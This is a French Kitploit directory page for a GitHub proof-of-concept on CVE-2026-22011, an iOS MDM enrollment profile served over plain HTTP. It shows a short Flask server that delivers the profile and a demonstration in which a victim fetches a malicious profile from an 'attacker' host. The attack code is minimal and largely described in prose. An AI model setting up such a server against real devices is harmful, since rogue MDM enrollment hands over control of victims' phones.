Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — Serveur Flask PoC pour CVE-2026-22011 qui sert un profil d'inscription MDM iOS malveillant via HTTP, permettant l'interception homme du milieu et la compromission de l'appareil. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
Sécurité iOSAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionSécurité Mobile
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

Serveur Flask PoC pour CVE-2026-22011 qui sert un profil d'inscription MDM iOS malveillant via HTTP, permettant l'interception homme du milieu et la compromission de l'appareil.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 16 joursPas encore vérifié

CVE-2026-22011 – Livraison du profil MDM iOS via HTTP

Code du programme (serveur MDM Python Flask)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – Livraison du profil MDM iOS via HTTP

Severity: High

Vue d'ensemble

Un profil d'inscription MDM est servi via HTTP en clair, sans chiffrement ni vérification de signature numérique. Un attaquant sur le même réseau peut intercepter la requête et remplacer le profil par un profil malveillant, obtenant ainsi des privilèges de gestion des appareils.

Détails de la vulnérabilité

  • Type : Man‑in‑the‑Middle / Transport non sécurisé
  • Impact : Compromission totale de l'appareil via un MDM malveillant.
  • Cause racine : L'URL du profil est en HTTP, et iOS n'impose pas HTTPS pour l'inscription MDM (selon la configuration), ce qui permet l'interception.

Démonstration de l'exploit

Démarrez le serveur HTTP de l'attaquant :

root@kitploit:~
python mdm_server.py

Lorsque la victime visite http://attacker/enroll.mobileconfig, le profil malveillant est téléchargé.

Télécharger l’outil